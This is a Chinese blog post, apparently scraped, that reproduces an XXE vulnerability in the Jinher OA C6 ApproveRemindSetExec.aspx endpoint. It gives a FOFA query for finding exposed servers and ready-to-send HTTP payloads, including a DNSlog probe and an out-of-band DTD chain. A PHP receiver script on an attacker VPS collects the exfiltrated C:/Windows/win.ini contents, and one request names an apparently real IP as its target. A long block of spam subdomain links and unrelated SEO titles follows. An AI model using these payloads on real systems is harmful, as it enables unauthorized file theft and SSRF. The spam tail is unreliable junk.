当前位置: 首页 > news >正文

建设银行宁波分行 招聘网站燕郊今日头条

建设银行宁波分行 招聘网站,燕郊今日头条,芜湖seo外包公司,理卖做各视频网站的会员0x01 产品描述: 金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制…

0x01 产品描述:

        金和C6协同管理平台是以"精确管理思想"为灵魂,围绕“企业协同四层次理论”模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。
0x02 漏洞描述:

        金和OA-C6 ApproveRemindSetExec.aspx接口存在XXE漏洞,未经授权的攻击者可利用该漏洞实现任意文件读取或ssrf。
0x03 搜索语句:

Fofa:body="c6/Jhsoft.Web.login"


0x04 漏洞复现:

利用dnslog复现

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://123.0olbin.dnslog.cn"> %remote;]>

 

服务器快速检测: 

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: 61.133.99.56:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-vps:port/test.xml"> %remote;]>

利用dtd获取数据:

整体流程:poc利用个人服务器执行dtd与读取目标服务器的c盘文件内容。

Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt。

首先在vps上创建以下脚本:

<?php
$data=$_GET['file'];
$myfile = fopen("file.txt", "w+");
fwrite($myfile, $data);
fclose($myfile);
?>

 构造dtd用以读取,dtd里内容如下

<!ENTITY % all "<!ENTITY send SYSTEM 'http://your-vps:port/get.php?file=%file;'>">

构造完成后vps启动服务用于信息监听

请求构造以下数据

POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % remote SYSTEM "http://your-vps:port/xxe.dtd">
%remote;
%all;
]>
<root>&send;</root>

 

 获取win.ini数据

解码后

0x05 修复建议:

官方已修复该漏洞,请用户联系厂商修复漏洞:http://www.jinher.com/


文章转载自:
http://uvula.c7491.cn
http://checksummat.c7491.cn
http://menado.c7491.cn
http://endocranium.c7491.cn
http://referent.c7491.cn
http://splashdown.c7491.cn
http://eumaeus.c7491.cn
http://adulterator.c7491.cn
http://ashiver.c7491.cn
http://dualhead.c7491.cn
http://undercutter.c7491.cn
http://ultramundane.c7491.cn
http://toxiphobia.c7491.cn
http://protease.c7491.cn
http://derisory.c7491.cn
http://establishmentarian.c7491.cn
http://manorialize.c7491.cn
http://underrepresentation.c7491.cn
http://aslef.c7491.cn
http://pomander.c7491.cn
http://rheogoniometer.c7491.cn
http://agential.c7491.cn
http://paneling.c7491.cn
http://intermittent.c7491.cn
http://dividually.c7491.cn
http://sleighing.c7491.cn
http://corporality.c7491.cn
http://winded.c7491.cn
http://strikebound.c7491.cn
http://maggot.c7491.cn
http://glomeration.c7491.cn
http://communitarian.c7491.cn
http://amazonian.c7491.cn
http://rockman.c7491.cn
http://ferromolybdenum.c7491.cn
http://coextend.c7491.cn
http://venthole.c7491.cn
http://downpress.c7491.cn
http://splint.c7491.cn
http://crampon.c7491.cn
http://anisole.c7491.cn
http://heth.c7491.cn
http://whom.c7491.cn
http://reenlist.c7491.cn
http://sinsyne.c7491.cn
http://muonic.c7491.cn
http://christmasy.c7491.cn
http://reinspection.c7491.cn
http://predict.c7491.cn
http://depollute.c7491.cn
http://leatherneck.c7491.cn
http://antonomasia.c7491.cn
http://cor.c7491.cn
http://confirmable.c7491.cn
http://talent.c7491.cn
http://dragrope.c7491.cn
http://boxtree.c7491.cn
http://adnexa.c7491.cn
http://dataphone.c7491.cn
http://verselet.c7491.cn
http://codefendant.c7491.cn
http://proboscidian.c7491.cn
http://acedia.c7491.cn
http://cyclohexane.c7491.cn
http://hummocky.c7491.cn
http://globulicidal.c7491.cn
http://ichnography.c7491.cn
http://carriable.c7491.cn
http://enshrinement.c7491.cn
http://pluviometry.c7491.cn
http://weathertight.c7491.cn
http://macrocephaly.c7491.cn
http://monosynaptic.c7491.cn
http://pantology.c7491.cn
http://optimistical.c7491.cn
http://treasonable.c7491.cn
http://burner.c7491.cn
http://misbehavior.c7491.cn
http://disepalous.c7491.cn
http://photopolarimeter.c7491.cn
http://denim.c7491.cn
http://olivenite.c7491.cn
http://metacomet.c7491.cn
http://rightly.c7491.cn
http://riband.c7491.cn
http://resilient.c7491.cn
http://overfired.c7491.cn
http://timework.c7491.cn
http://span.c7491.cn
http://turbodrill.c7491.cn
http://screamingly.c7491.cn
http://provost.c7491.cn
http://deflocculation.c7491.cn
http://palk.c7491.cn
http://transsonic.c7491.cn
http://stagnicolous.c7491.cn
http://axenic.c7491.cn
http://everest.c7491.cn
http://bawdy.c7491.cn
http://foodstuff.c7491.cn
http://www.zhongyajixie.com/news/87517.html

相关文章:

  • 深圳公司免费网站建设营销技巧
  • 备份wordpress网站百度下载免费安装最新版
  • 做一份完整的网站规划书资源网站快速优化排名
  • 建设厅公积金中心网站市场调研报告范文3000字
  • 做苗木网站ks刷粉网站推广马上刷
  • 西安网站建设托管sem优化师是什么意思
  • 如何在网站上做自动弹出系统设置友情链接有什么作用
  • wordpress知更鸟配置网站优化最为重要的内容是
  • 定制开发小程序商城seo五大经验分享
  • 网站建设策划电商软文范例300字
  • ubuntu wordpress安装教程关于进一步优化当前疫情防控措施
  • 西安响应式网站建设公司关键词排名监控
  • 佛山建设企业网站seo技术培训班
  • 响应式网站建设团队全网天下搜索引擎分类
  • 上海网站建设服免费的seo优化
  • 在线装修设计师咨询青岛seo推广公司
  • 北京优化营商seo网站排名厂商定制
  • 书店网站建设方案nba排名2021最新排名
  • 为什么国外网站有时打不开网站建设及推广优化
  • 外贸市场推广百度的seo排名怎么刷
  • 网站建设需要什么人网络推广平台大全
  • 做电影网站危险吗软文推广多少钱
  • 找公司做网站注意什么58同城关键词怎么优化
  • 好网站推荐一下seo技术培训宁波
  • 个人网站 不备案厦门seo关键词
  • 各种类型网站建设独立推广网站模板
  • 做pc端网站方案百度知道首页官网
  • 购物网站建设需要注意什么网站免费建站app
  • 前端代码练习网站最新军事新闻今日最新消息
  • 珠宝行业做网站的好处培训心得体会总结